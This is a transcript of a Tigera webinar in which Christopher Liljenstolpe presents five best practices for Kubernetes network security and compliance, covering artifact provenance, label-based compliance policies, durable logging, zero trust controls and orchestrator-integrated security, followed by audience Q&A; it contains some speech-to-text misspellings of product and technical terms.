While a microservice architecture, orchestrated by Kubernetes, offers a tremendous business advantage for time to market, proper security and compliance controls must be put in place.
This is a crucial step when deploying microservices and teams must work together by using the proper tools during implementation. We will explore 5 things you can do to meet security and compliance requirements for your microservices stack.
Watch this webinar to learn about considerations for security and compliance with microservices, understanding key principles for compliance, and leveraging the proper security tools and methods for compliance.
Michael: Hello everyone, and welcome to today’s webinar, Top Five Best Practices for Kubernetes’ Network Security and Compliance. My name is Michael, I’ll be your host. I’m sitting in for Erica today. I am pleased to announce today’s speaker, Christopher Liljenstolpe, he is the original architect behind Tigera’s Project Calico. He speaks at over 60 meetups yearly, educating on networking and network security for modern applications of microservices. He also consults with Tigera’s enterprise clients on security and compliance for their modern applications.
Michael: So, before I hand the microphone over to Christopher, I have a few housekeeping items that I’d like to cover about this presentation and webinar platform that you’re on. First, today’s webinar will be available on demand immediately after the live session, and will be accessible through the same link that you are using now and on the Tigera BrightTALK channel. We’ve also added some attachments and links which are available in the ‘attachments’ tab on your screen. There, you can find a copy of today’s deck and some other related links. And also, if you have questions, we’d love to hear from you. You can ask those questions by going to the ‘questions’ tab on the right and asking them. We will get to those questions at the end of the presentation. And if we don’t get to your question, we will make sure to do our best to answer it in follow-up afterwards.
Michael: So, without any further ado, I’d like to hand the mic over to Christopher and to our presentation today.
Christopher: Thank you, Michael. So, welcome everyone. What I’m gonna be talking about today is some of the approaches that you should be thinking about for securing your Kubernetes environment and maintaining compliance in your Kubernetes environments. So, I’m gonna talk about five best practices. What we’re really gonna be talking about is what you need to be thinking about in these areas. And I’ll give you some examples of what we’ve seen other customers do, what types of technologies you might wanna look at for doing these things, but I’m not gonna be prescriptive in this. And I welcome questions, we can dive into any of these if there’s interest.
Christopher: So, first let’s talk about why this is different. And I’ve talked about this a lot before, but why do we need to talk about this now, in a Kubernetes, or containerized, world? Why can’t we use exactly the same mechanics that we’ve used before? And really, the thing is that application development and deployment has fundamentally changed, or is in the process of going through a fundamental change. And it’s happening much faster, I think, than most people realize. And we’re taking applications, first of all, and we’re decomposing them into microservices. Instead of rewriting the same code 20 different times in 20 different applications in your stack, you decompose things into services so that you have a microservice that does one thing, and it can be consumed by other microservices, and you start sticking those together like Lego blocks to build your applications. That is a pattern that’s being actively pursued today, and part of the reason for doing that is it makes your application development deployment much more agile, faster response to changing market requirements or customer requirements, et cetera.
Christopher: So, the microservization, or pre-microservices have monolithic applications, is one driver. In order to have those microservices be consumable wherever you want to deploy them, we’re wrapping those in containers. Docker containers, Rocket, there’s other container mechanisms out there, but we’re containerizing these microservices, and those become the deployment artifacts. We’ll talk about deployment artifacts in a bit. As you do this, you really want to have these environments be automatic, automatically respond to failing workloads, to increases or decreases in demand, et cetera. So, if you want to have a responsive environment, you need to have automatic orchestration. And that’s where things like Kubernetes, et cetera, come in, where you basically explain to Kubernetes how you want your application to behave and how it’s made up, how it’s composed, what microservices are involved, et cetera.
Christopher: And Kubernetes, or one of the other orchestration platforms out there, Kubernetes seems to be the dominant one today, will then deploy those applications and manage the life cycle of your application stacks for you. And it will do that in very fast time, time cycles of milliseconds, it will make decisions. And it will manage a potentially very large fleet of microservices, of containers. Hundreds of thousands of containers across thousands of servers is sort of the scope of where some people are already. And you want to be able to deploy these things wherever it makes sense. So, let’s say you start off with a private data center and then you decide you want to extend into public cloud for whatever reasons. Cost control or agility, it takes time to build a data center, there are already data centers in existence and from various providers like Amazon Manager, Google, et cetera, so you want to deploy there.
Christopher: Or maybe you wanna deploy into an area where you don’t have organic footprint. Let’s say you’re a US-based SAS provider and you wanna test the waters in Europe or in Asia. Instead of building a data center there, you might wanna go try and deploy a public cloud first and see if that will work. Similarly, acquisitions, M & A functions, the opposite of acquisition, you get spun off, you need to have flexibility because the thing you’re requiring, for example, might be running in Azure and you’re running in AWS. So, you need to be able to point these workloads where they make sense, and you need to make sure your artifacts and your policies and everything else are portable across all those environments, rather than having to rework everything because you moved from, say, AWS to Azure or Google. So, that’s how some things are changing in this space.
Christopher: We go to the next slide. So, we have this new environment, however, it does bring with it some consequences. Any change brings consequences. So first, from a security standpoint, perimeter security is no longer adequate. We have to assume that part of my network or infrastructure is compromised. There are two types of organizations in this world, those that know they have an advanced, persistent threat internal to their organization, and those that don’t. So, we have to assume there’s compromise. Part of that can be just because we’re deploying so many different artifacts, so many different microservices today that have variable problems, where the developer got the base code from, et cetera. You might have imported code that might have a problem. You might’ve gotten spearfished and some developer doesn’t even know that he’s inserting bad code somewhere. So, we have to assume that there’s compromise in the infrastructure.
Christopher: You also can no longer use security policies that are hard coded based on locations, a zone based environment. You’re in this VLAN, you’re on this IP address, this application is on this IP address. Because in a Kubernetes environment, or a Kubernetes-like environment, those things change. There aren’t things like separate VLANs, there aren’t things like static IPs. You can do that, but you sort of break the model. And what do you do if Kubernetes decides it needs to autoscale your given microservice from five nodes to a hundred nodes? It’s gotta get those addresses from somewhere, so having security tied to hard coded location-based assets is really no longer appropriate.
Christopher: Secondly, or thirdly, constant need to reconfigure firewalls. Most folks today, if you do a firewall change, I’m gonna say, average we see is a couple of weeks for someone to get a firewall change, rule change, put in. I’ve seen some folks that go up to four months. Some folks take it down to days. None of those is the five or ten-minute timeframe with which a developer can push a new version of the application to meet a blue-green test or something along those lines. So, if I need to update a firewall and it takes two weeks, then it doesn’t matter if my developer can use Kubernetes and Docker to deploy a new version of the application in five minutes if it’s gonna take two weeks to get the firewall updated to allow that to function. So, we’re sort of missing the boat and the benefit of doing this kind of approach if we’re still stuck with legacy, static firewall rules.
Christopher: Similarly, the next vein, Visibility and Traceability, in this kind of environment, most of the traffic now that used to be internal to a monolithic application [inaudible 00:09:17] is now traveling across the network, doing something we call east-west traffic. These are microservices making calls to other microservices. So, we now have most of the traffic in your network is going to be intra-application, but inter-microservice traffic, or east-west traffic. And visibility mechanisms, et cetera, that we have that were primarily focused on ingress and egress out of a cluster aren’t really fit for purpose when we’re talking about flows, potentially, between hundreds of thousands of endpoints.
Christopher: Similarly, because the artifacts that those visibility systems used, like IP addresses, are now dynamic, you might end up with a log that says IP address A talked to IP address B three months ago, and the auditors might be interested in that conversation. But you have no idea what that thing was three months ago, ’cause that IP address might’ve been reused multiple times in the same day. So, that log is pretty much useless. It’s like, an IP address talked to another IP address on a port, but I don’t know what the source was and I don’t know what the destination was. So, there’s a visibility problem there.
Christopher: You also need to aggregate the data. There’s a lot more data, there’s a much richer set of signals coming out, but you do need to aggregate it to get your SIEM. And it’s gotta be correlated, again, go back to IP addresses, if the SIEM that is keying off of IP addresses for that aggregation, that’s not gonna work, ’cause that same IP address could be used by multiple different microservices in any given day, or even any given hour. And workload identity, this all comes back to this workload identity. I need to know what the actual workload was, not where it was in the network at any given point in time.
Christopher: Lastly, Controls and Compliance. Security teams, in this environment, are unable to provide complete and accurate data. And again, this comes back to visibility and traceability, in order to make sure that you are compliant, in order to ensure compliance and prove out through a compliance audit, that you’ve been compliant. Most of the compliance tools and reports have been built around the fact that these applications were static, the BMs were static. They lived for months or years, or the servers, et cetera, and that’s no longer the case.
Christopher: The last thing, and probably the most important thing about this change, is today, most organizations are very siloed. The network teams, the security teams, the platform teams, the application development teams are all very siloed, and the way they interact with each other is in a waterfall model. They pass tickets back and forth to request services, request changes. That doesn’t work in this kind of model where you’re trying to be agile and develop things. So, you need to start having security tools that allow these groups to all collaborate in an agile fashion rather than relying on trouble tickets and email to make your changes. So, that’s some of the things that change in this environment and some of the things you need to be thinking about if you move to this kind of environment.
Christopher: So, I sort of identified five things that you really should be thinking about as you go onto this journey. So, why don’t we start with the first? Now, I’m gonna talk about Controls and Compliance.
Christopher: The first thing we probably should do is make sure that you’re deploying what you think you should be deploying. So, you will probably want to use artifact analysis, static and/or runtime analysis to increase confidence that the workload that you’re deploying, the microservice or the Docker container that you’re deploying, is not compromised or isn’t vulnerable. It doesn’t already have 20 CBEs on it. So, that’s one thing. Is this thing that I’m going to deploy trustworthy? There are a number of repos, repositories, for containers that you can use. Some of them come with platforms like OpenShift. Others you can use publicly like Docker Hub or Key, and those can do container scanning for you, container scanning so you know that at least the thing you’re deploying doesn’t have any known CBEs, or at least no major CBEs, or even if it has a major CBE, you can look at and say, “That’s not something that’s exposed to mis-container, so it’s not a critical thing for me to cover,” but at least you go into this with your eyes open. So, let’s take a look at those workloads.
Christopher: Second, you need maintain a providence … sorry, within this one, go back. Michael’s a little fast on the button, there. Maintain a providence that is verifiable and traceable on your artifacts. So, once you’ve written that code and you’ve checked that code and you know it does what you want it to do, you want to make sure that that is always the same, that somebody can’t come in later and make a change to that code and not have you know about it. Because what’s going to happen when Kubernetes decides it needs to spit out 10 more of these things, it’s just gonna go back to the same repo and pull that image again. So unless you know that that hasn’t been irked with or screwed with, you don’t really know if you’re deploying the same thing.
Christopher: So, you want to use source code control systems like Git, or something along those lines. You wanna maybe do fingerprinting on those workloads. You want to do things to make sure that once you’ve decided through your CIC pipeline, et cetera, that this workload is the thing you want to deploy, this version of the container is what you wanna deploy. You want to make sure that’s what you always deploy. So, let’s make use of those source code control systems and those CISV chains, fingerprinting and other things, to make sure that you’re deploying what you think you’re deploying. And in order to do that, let’s make sure that these are repeatable, again, using a source code control system and a CIC chain instead of having people just use, say, Cube Cuddle, cube control to deploy a pod when they need to, maybe that should go through a CICV chain such that when somebody commits the code, it goes into the CI environment, and then CDN deploys. And that way, everything is traceable back through that source code control CIC system and it’s all appropriately logged, et cetera.
Christopher: If we go on to best practice two, now we need to make sure that all our deployments are in compliance. One of the things you want to do because things like IP addresses are ephemeral, we need to use other things to identify the workloads. That could be fingerprints, that could be metadata, labels on the workload, “This thing is a PCI
Christopher: Data labels on the workload, this thing is a PCI contaminated database. This thing is a PCI compliant courier of that database, this thing is for application, is a microservice and application, Bob. It is in stage prod It’s been approved for use in production versus dev or test. So all those metadata labels are actively used by other things in Kubernetes. Your developers are taxing these labels. If you can use these labels as an identity or rather than an IP address, you’re way far ahead because the labels now describe what the thing is. Same as fingerprints, et cetera. So you can then start attaching compliance regimes via labels. This workload requires to be in the PCI compliance regime or the GDPR compliance regime, or ISO, or whatever ones you have, FedRAMP. So use this metadata, to identify the compliance regimes, the functions, the state, etc.
Christopher: That is a much more useful, and if you think about multifactor way of identifying a workload than just an IP address. Second, you need to make sure that your compliance policies are themselves controlled and automatically applied. so instead of making the decision that I need to apply these policies, do I need to apply this policy to this workload, etc. Instead, you should be saying, “Here’s the label that identifies a state or a function of this application. This database is contaminated with PCI data, credit card data. That might be the label, PCI contaminated. Then you can write policies that say, “I don’t care if it’s a database, if it’s an application, if it’s an S3 bucket.”
Christopher: If it’s labeled that it’s PCI contaminated, then the PCI set of policies must be applied to it, or the GDPR policies must be applied to it if it’s PII contaminated data and location is in Europe or anywhere else, frankly, with the way the rules written, but the policies are attracted to the state and the workload automatically. Especially if you’re using something like Kubernetes Network Policy and Tigera Solution that implements that. Rather than you having to make a decision on a case by case basis or worse yet, having your developers have to make that decision if something needs to be secured or not. Then you need to make sure that for the policies that do things like enforced compliance and keep you out of a congressional testimony room, that only people who are appropriately qualified can make changes to those policies, ie. the developer can’t change what the PCI Control Policy is, only the compliance team can, et cetera. So you need to make sure that the policies can only be changed by the appropriate people, or created or deleted, and that the policies are automatically attracted.
Christopher: So that’s the next thing you need to do to ensure that your deployments are in compliance. We go to the next slide, we need to make sure that logs are meaningful and durable. So we’re talking about potentially thousands of servers. We have customers who are using Tigera solution with tens of thousands of servers. So you’ve got lots of endpoints all reporting, and some of those servers might be hosting hundreds of workloads each. So you’ve got to keep all of this correlated so that all of the signal coming in to the logging platform, to your CM, etc, is correlated so you can actually detect what’s really happening in the platform. So all these events, both administrative and operational, must be logged, and by administrative, I’m talking more about audit laws, rules, who deployed that container or who watched that deployment, who edited that policy, et cetera and operational. This policy blocked traffic to this PCI workload because the other end was not PCI compliant.
Christopher: So those are operational logs versus the first which are administrative. All of these things must be date-time coordinated, correlated. You need to make sure everything has the same concept of time so that you don’t have things firing off logs that look like they’re minutes apart when really, they happened at the same time, or if look like they happened at the same time when they really didn’t. They need to be immutable. Your logs need to be immutable. Somebody can go in and change your logs, your logs aren’t really all that useful, so you need to make sure that you have some form of immutability control, write-inly access for the system, controlled write only, and then other people can not read or fingerprinting of the, of the logs. There’s multiple ways you can do this, but you do need to make sure they’re immutable.
Christopher: Those logs need to reference a long lived identity, and preferably multiple factor identity. What were the labels? What were the Kubernetes namespace? What’s the Kubernetes namespace this was deployed in? What was the actual name of the pod which is derived from the actual deployment name? What was the service account, ie. the X509 certificate was attached to this. So you need to start looking at multiple forms of identity to be able to with surety, say this workload was exactly of this type that generated this logging event. The other thing that’s really useful is to refer to the policies or controls or involved in the event. So let’s say we say the traffic was blocked or allowed to this PCI contaminated database. Not only do I want to know that that was allowed or denied and who actually made that access, what was the other end, but it’d be really nice to know what policy allowed it or denied it so I can see if my policy controls were correct.
Christopher: It might’ve gotten blocked, but if I go back later and say, it was blocked by some other policy, not the PCI control policy that it should have been blocked by, now I know I have a policy problem. The flow is still blocked, so we’re still okay, but we’re okay by accident, not by purpose. So having the actual policies that were involved allow you to then say, go back to your auditors and say at any point in time, at 4:58, three months ago on a Friday afternoon, the PCI policy was working exactly as expected, or it wasn’t and we found out why and we fixed the problem. The other thing you need to do is have alerting and diagnostics based on time series data streams. There’s a lot of signal going on here. You probably do not want to have your alerting system triggered for each and every dropped packet, or you will never get any sleep and it will eventually just become background noise and no one will respond to it, so you’re really interested in alerting and logging and reporting on data based on time series.
Christopher: Did a cluster of events happen right next to each other or over a long period of time? What was the rate of events for this policy, and below this level of just standard door knocking and I don’t care versus “Oh, that’s a really interesting thing.” All of a sudden I went to 10 times greater violations on my PCI compliance policies than I had before, then we might be having an event going on. It’s really useful then to say, “Oh, and it’s this version of this workload that did that, and I traced that back,” going back to my earlier comments, and see, that was based on this version that just got pushed and we did it, pulled a new version of something out of Docker Hub or Key and it turns out that maybe that thing isn’t quite Jake, isn’t quite good.
Christopher: So that tells you immediately where your problem is. If we go to the fourth item, we need to embrace it. The zero trust network security, and this is going to sound like a broken record because everyone talks about zero trust security, but what we mean by this is we have to assume that you have one or more compromises in your network. I used to be a US park ranger, and one of the things we got in our, in our officer survival training was once you find a weapon on a subject, don’t stop searching because people who have one weapon probably have more than one weapon. So just because you find a compromise in your infrastructure, don’t assume you found all the compromises in the infrastructure. Always assume there’s compromise, always assume there are multiple compromises. There are multiple compromises.
Christopher: Having the assumption that a single control point can provide security is a pretty bad idea because that might be the thing that’s compromised. So that all leads to another point which is multiple control points. You wanna make sure that your policies, the controls that you’re putting into your system, are enforced at multiple points in the infrastructure, say in the pod, outside of the pod, on the same host in the infrastructure, etc, that you’re providing multiple control points such that a compromise of any one of them does not compromise your security posture. Multifactor identity. You want to make your decisions based not just on a single thing, but on multiple factors. What’s the behavior of the application? Is this pod behaving like we expect it to? It’s trying to talk to the things we’re trying to expect, that we expect it to talk to. Is it the identities that the orchestrator has assigned to it, cryptographic identities based on service accounts or something like that.
Christopher: So you want to make these decisions about what to enforce on what based on multiple factors of identity. So again, if there’s single compromise, you’re still probably safe, and you want to do these controls at multiple layers of the stack because there’s different data at different points in the stack, so I could write a policy that Bob’s, can talk to Alice’s on port 443. That’s great. That’s at the network layer. I could make it stronger by saying Bob can talk to Alice’s on 443, but they can only make an http get for customer records. The URI is prefaced by customer record. Now I’ve got a layer five through seven behavior attached to this as well. Lastly, I can say Bob’s can only talk to Alice’s on 443, can only do http gets by URIs prefaced by customer record and requires a certificate IE service account that belongs to this group of service accounts.
Christopher: So I now have controls at the TLS layer, at the application layer, ie. that http query and at the network layer, and now all of those things have to line up in order for that traffic to flow. If any one of those things doesn’t match, the traffic is blocked and I get an alert. So having control to multiple points at multiple layers of the infrastructure based on multiple identities, I now have a reasonable assurance against compromise unless the compromise has to happens to be on the wire and I’ve got a man in the middle. I’ve decided to allow the traffic, but then there’s a man in the middle. We’ve talked about cryptographic controls in this kind of environment. It is best to encrypt the traffic in flight, and you want that to be automated. You don’t want to have to be managing two things.
Christopher: You don’t want to be managing the keys yourself. You want the system to do that because again, these pods are coming and going all the time. You want a certificate assigned to each and individual workload because you don’t want to [inaudible 00:27:38] compromise to take out 100 or 200 or 1000 or 10000 workloads. Lastly, you probably don’t want your developers to be doIng all the TLS work themselves. developers screw up crypto. Not only that, if you had all of your developers build the crypto into your app, and then heartbleed two comes along and you have to figure out all the applications, all the microservices that use TLS, which would be all of them, and go fix all of them with the new library, versus having a service that maybe embeds in the pod, like Istio, and its envoy proxy to actually offload that TLS within the pod, but outside of the application, so you now have one place to fix it if there’s a cryptographic problem.
Christopher: And that’s the key thing here, is most people either embed crypto in the application, which means you have to touch all the applications when heartbleed happens again and it will, or you have some big middle box somewhere, or even on the host, say we do it at the host layer. You’ve got 100 containers. That means hundreds of carriers on that host all have to share their keys with that one end point. That becomes a jucier target. There’s 100 keys to compromise if I get on that host. If I do it, there’s a middle box TLS gateway, maybe I have tens of thousands of keys that have to sit on there. It’s created a wonderful man in the middle point for an attacker to go after and get all your keys to the kingdom, literally. If you do this where it is something that slides into the pod, but it’s not part of the application itself, it only has one key.
Christopher: It only has the key for that instance of that microservice. The compromise is limited, the blast radius is limited. So look at doing something like Istio Envoy to do your TLS security rather than either doing this as a middle box approach at the host level, or higher up the stack. Lastly, orchestrate your security just like you orchestrate your code. So security should not be something that you deal with on an entirely separate pane of glass. You might have, okay, a glass that gives you security type information, but you want to make sure that your security system can be integrated into the CIC pipeline, the source code control, etc. so that any point in time, you can roll back to a known good security standpoint. If somebody writes security roles and they touch a sensitive area, make sure that those are back controlled. Only the compliance folks can write rules that are about compliance.
Christopher: Make sure that changes that people make potentially have code review, [inaudible 00:30:17] policy review, or a policy enforcement review. All those things that you already do for your code deployment, you should be doing for security. Once you put the security artifacts into your control system and you’re using CIPD to deploy them, then the orchestrator needs to deliver these. The orchestrator is orchestrating everything else in the system using a security enforcement mechanism, policy enforcement mechanism, compliance mechanism that is not driven by the orchestrator is frankly barking mad. I tend not to be so vocal sometimes, but your orchestrator is orchestrating everything else. It’s orchestrating your storage, it’s orchestrating your conductivity between your microservices. It’s doing all of those things.
Christopher: If your security is separate from that, then you will inherently have a disconnect, an impedance mismatch between your security platform and everything else, so anything you’re doing should be driven via the orchestration, either taking inputs from the orchestration of events from the orchestrator so it can respond, but you want the orchestrator and your platform to be very closely linked. If they’re not, you’re going to open up holes, seams, and they will be exploited. So make sure that your compliance and security platform are integrated with the orchestration. The orchestration system can drive it just like it’s driving everything else. Your controls, your security artifacts need to be workload centric. You shouldn’t be thinking about this VLAN, you can talk to this VLAN. VLANs are [inaudible 00:32:01]. They may not even exist.
Christopher: For this VLAN, VLANs are ephemeral, they might not even exist. IP addresses, et cetera, I sound like a broken record here, but the security needs to be tied to the artifacts and the orchestrator and other things surface. It needs to be enforced as close to that workload as possible. It needs to be tied to the workload, not to a secondary thing like the IP address of a workload and do that in a middle box firewall somewhere. The security enforcement needs to be very closely coupled to that workload, so wherever the workload goes, the policy follows, the policy enforcement follows. I think with that, those are what I call five best practices. There are probably a few more, well there’s definitely a few more that are out there, but five was a good starting point. I’d love to hear what your thoughts are about or questions that you have at this point. Michael, I turn it back over to you.
Michael: Thank you, once again, if you have questions, you can go ahead and put them into the input on the right that says questions. We do have some questions. A couple questions that are around when you mentioned CICD systems. I guess maybe can you talk a little bit more about security when integrating a CICD system into Kubernetes?
Christopher: Sure. There are two factors to that. One is, the security of the link between the CICD system and Kubernetes. Two, what you might want to do from a security control standpoint from things going through a CICD system. First of all, Kubernetes most of the damage you can do in Kubernetes is controlled by RBAC. If you’re doing CICD to say CD specifically to deployments or services et cetera into Kubernetes. You need to make sure that that CICD system has the appropriate RBAC controls is using TLS and is using client side search to authenticate et cetera as well. You want to make sure that the CD system is appropriately scoped. You might even want to think about having different CD runners based on what the thing is you’re deploying. You might have a different CD runner for example for things that are going to deploy compliance to your policies, versus developer policies, versus deploying just having DevOps deploying an application. Those might be different CD runners with different RBAC controls on them, different RBAC principles on them to make sure that somebody can’t subvert one of those CD runners to do something that they shouldn’t be able to do, that’s one.
Christopher: If we look at the other side of that equation and we look at what controls can you put in CICD to make sure that you’re maintaining security in your platform. Things that are security relevant like label assertion and other things can be done in CICD. You can basically say in your CD system, anyone who tries to assert a label of PCI compliance, true but unless that person is of the right group in Git, which again should be tied back to RBAC that says they’re part of the compliance team. Then instead of just running that CICD pipeline, that then gets pulled out for a code review for lack of a better word. Just like any other code review, and that code review goes to someone on the compliance team to make a decision, should that workload be labeled PCI compliant is true or not. There’s using CICD to enforce controls on what goes through the CICD pipeline. As well as controls of the CICD pipeline itself to make sure that again, limited least privilege. Make sure the runner et cetera have only the privileges necessary to do the things that you’re asking them to do. Which means having different runners for different types of tasks that you might run through your CICD pipeline.
Michael: We had a question just come in actually that just said, with a zero trust network does that mean that perimeter firewalls and DMZs and so forth, are they dead? Do you no longer need them?
Christopher: I have two answers here. I will first take the inflammatory answer say if you do it right, I would say that is probably not the case so long as you really do it right. For example, you may not need them if all your workloads have been appropriately hardened and you’re using TLS and you’re doing appropriate authentication for every TLS flow et cetera. Then you may not indeed need a firewall or a DMZ. If you were interested in that, you can go back and look at the Google Beyond papers for their thinking on that. I tend to agree with that. In fact, it was a similar thing, I wrote a blog about this a couple weeks ago and I have a followup blog coming out. What I did for Tigera at Blackout. We were very much based on application layer encryptions rather than classic fire walling.
Christopher: That said, basic firewalls and DMZs do have their place. Especially if you can move them off site. I start looking at perimeter, what I might be asking the perimeter to do then is bulk filtering. Filtering out DDOS attacks, filtering out things that just are [inaudible 00:37:36] coming in that I’d otherwise be spending CPU cycles on my worker nodes to filter. When really, it’s just simple static rules that keep the bulk of the noise out. No one should be [inaudible 00:37:47] into my cluster from the outside. I can just filter that at the edge and it’s a very clean point. I have to make the assumption that somebody is going to get past that, so I should have rules that SSH internally as well. At least it’s a first level coarse filter. If you can move it off site, then things like DDOS damage doesn’t come in through your constrained WAN links and is blocked at the other edge, where it’s up to the service provider to absorb rather than you. I think there is a place for them, but do I think you could have just as secure an environment without them? I think it’s possible, but you have to put a lot of careful thought before you go down that path.
Michael: We had a question around non production environments and what approaches you would have to balancing security when you’re using a non production environment also.
Christopher: I think the production, non prod environment thing, you can relax your security requirements on non prod. You probably should make sure that non prod can’t talk to prod, or you might want to say that non prod or test can read from prod but not right to prod if you want a protection on real data. All those rules are possible. The thing though that I like to day, and this goes back to a large electric car manufacturer who had a bit of a problem on their Kubernetes cluster some time ago. Be very careful having different policies for prod and non prod or test and dev versus prod. If you test with one set of security controls and then you go into production with a different set, there are a couple problems. Best case, you end up breaking things because you can’t get access to things that you tested and you got access to in test because you had weaker security controls. That means the system’s protecting you. The other option of course is, you didn’t test the control that you’re putting in, and it turns out the control, the extra control you put in in dev, in prod doesn’t work as you intended. Your test didn’t catch that because you’re only deploying that in product. Therefore, prod becomes your test and you may or may not discover that that control doesn’t work.
Christopher: Also, if you test with one set of controls and you tend to go prod with the other, just like ever other deployment, those decisions get made at the last second. It’s getting down to the wire, you’ve got to go prod tomorrow. Then you discover when you go into prod it doesn’t work. What are you going to do? If you’re under pressure, you’re going to deploy with the thing you tested, not what your target was prod. If you don’t test with what you’re going to deploy, you’re going to deploy what you tested. I would caution strongly against having different security models for test and dev versus prod. You want to make sure at the get go as part of your integration testing, your functional testing, your end to end testing is testing like you would go into prod. Otherwise, you will go into prod with what you tested with and that is probably a bad idea.
Michael: A question came in that mentioned around all the different compliance requirements that you had talked about. When you’re having to address multiple compliance needs, what’s the best approach for that?
Christopher: I think the best approach and what we counsel folks and what we’ve seen folks do is, you should not be writing policies for individual workloads. You should be writing policies for behaviors or personalities if you want to think of it, is this thing PCI contaminated? Does it have customer card record data in it? Is it PCI contaminated? Does it have personal identifying information in it? If it’s got PCI data, it’s probably also got personal identifying in it, so it’s also PII contaminated. It might have PII data in it and have health records, so it’s HIPPA contaminated. Instead of trying to handle all of those possible matrix of possibilities, you should just have a PCI policy. Only things that are identified as being PCI compliant can talk to PCI contaminated resources. Only things that have been proven HIPPA compliant can talk to HIPPA compliant contaminated resources, same thing. GDPR compliant to talk to PII contaminated resources. Then you identify that resource as being PII contaminated and PCI contaminated. Or PII contaminated and GDPR contaminated. Or HIPPA contaminated. The policies will be attracted to that label, that metadata that says this thing is PII contaminated or PCI contaminated.
Christopher: That way, you don’t have to do the full set of matrices of what the possible combinations are. You just say, here’s my PII rules, here’s my PCI rules, here’s my HIPPA rules. Those deploy independently to each of those workloads. It might mean that the next version of that database you split the patient record from the PII data. Now the patient records have some anonymizing data because you’re going to be doing some research on them and there’s some PII data that matched that anonymizing record locator to the patient identifying information. Then the resource that had been PII contaminated and HIPPA contaminated is now just HIPPA contaminated or PII contaminated. The next version will apply the right policies to each of those two new workloads. Whereas before, it was a single workload that had both. The compliance team never had to change anything there, all the change was the labels associated with it. It said, what is the personality of this workload or the set of personalities? I think that’s one way of doing it.
Christopher: We did get one question about … It sounds like you were saying that the logs should be able to answer all questions that may occur on all activities at any time. Are there any industry tools, papers, books et cetera that help us ensure that we’re covering those bases? I’m not really sure about papers and books. You should be logging everything if you can. You might want to be aggregating those logs, et cetera, but yes. It’s better to have more logs provided that you can make sense of them than less logs and saying, “Gee I really wish a knew what happened at that moment before it all went horribly, horribly wrong.” Yes. Everything should be logged. There are some great tools out there, things like EXK stacks, which is Elastic Search, Fluent D and Cabana or [inaudible 00:44:54] which is Elastic Search log stash and Cabana. You can look those up.
Christopher: We have lots of customers that use EXK or Elk. Then the logs go into that and then you can start doing Google like searches. Show me all of the events for over the last 30 days where positive this type tried to talk to positive this type and was the traffic allowed or denied? There’s lots of pooling around that that you can do. There’s commercial offerings that sort of package those up nicely as well. Those are the tools. As far as books and papers, there’s been a lot of stuff written over the years about managing logs. I can’t think of anything off the top of my head, but I would say it would be a good starting point however.
Michael: Okay, great. That’s about all the time we have for questions today. We’d like to thank you guys all for attending. Everyone give Christopher a big virtual hand and virtual applause. Two messages for you guys before we go, we are hiring here at Tigera. It’s a great, dynamic, fun place to work. If you guys match any of these open positions or are a talented person looking for a great career, please do contact us. Lastly, the next upcoming webinar that we have is on September 12th. It is 10 am Pacific, 1 pm ET. It is on IDS and IPS in the age of TLS V3. Now those are some acronyms, so this will be a technical presentation rather than a best practice. There’s the link to go get it, okay? Without further ado, we’d like to thank you guys all for coming. The copy of this webcast as a video will be available as soon as it processes on [inaudible 00:46:38]. Usually within five minutes, and it will be available if you want to review. Thanks again for coming.
Christopher: Thank you.